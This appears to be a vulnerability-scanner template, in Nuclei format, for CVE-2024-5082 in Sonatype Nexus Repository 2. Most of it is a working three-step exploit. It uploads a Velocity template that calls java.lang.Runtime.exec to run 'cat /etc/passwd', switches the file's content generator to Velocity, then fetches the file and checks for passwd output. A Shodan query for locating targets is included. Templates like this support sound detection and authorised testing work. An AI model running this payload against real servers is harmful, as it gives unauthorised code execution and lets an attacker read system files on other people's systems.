CVE-2024-5082: Nexus Repository 2 - Remote Code Execution

id: CVE-2024-5082

info:
  name: Nexus Repository 2 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Remote Code Execution vulnerability has been discovered in Sonatype Nexus Repository 2.This issue affects Nexus Repository 2 OSS/Pro versions up to and including 2.15.1.
  reference:
    - https://github.blog/security/vulnerability-research/attacks-on-maven-proxy-repositories/
    - https://support.sonatype.com/hc/en-us/articles/30694125380755
  classification:
    epss-score: 0.12225
    epss-percentile: 0.93612
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"Nexus Repository"
  tags: cve,cve2024,intrusive,nexus,sonartype,vkev

flow: http(1) && http(2) && http(3)

variables:
  username: "{{username}}"
  password: "{{password}}"
  credentials: "{{ username + ':' + password }}"

http:
  - raw:
      - |
        PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Authorization: Basic {{base64(credentials)}}
        Content-type: text/xml

        #set($engine="")
        #set($run=$engine.getClass().forName("java.lang.Runtime"))
        #set($runtime=$run.getRuntime())
        #set($proc=$runtime.exec("cat /etc/passwd"))
        #set($null=$proc.waitFor())
        #set($istr=$proc.getInputStream())
        #set($chr=$engine.getClass().forName("java.lang.Character"))
        #set($output="")
        #set($string=$engine.getClass().forName("java.lang.String"))
        #foreach($i in [1..$istr.available()])
        #set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))
        #end
        $output

    matchers:
      - type: status
        internal: true
        status:
          - 201

  - raw:
      - |
        PUT /nexus/service/local/repositories/releases/content//.nexus/attributes/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(credentials)}}
        Content-type: application/json

        {"contentGenerator":"velocity"}

    matchers:
      - type: status
        internal: true
        status:
          - 201

  - raw:
      - |
        GET /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(credentials)}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "text/plain"
# digest: 490a0046304402203df329b81462a32bfc68a76bf6239d007b1b738ecaf64f78e8635504ace2f2fd0220105d88c75497c12156cc96f72dd58b55da0595dc6f049335e2b80191e5ad640f:922c64590222798bb761d5b6d8e72950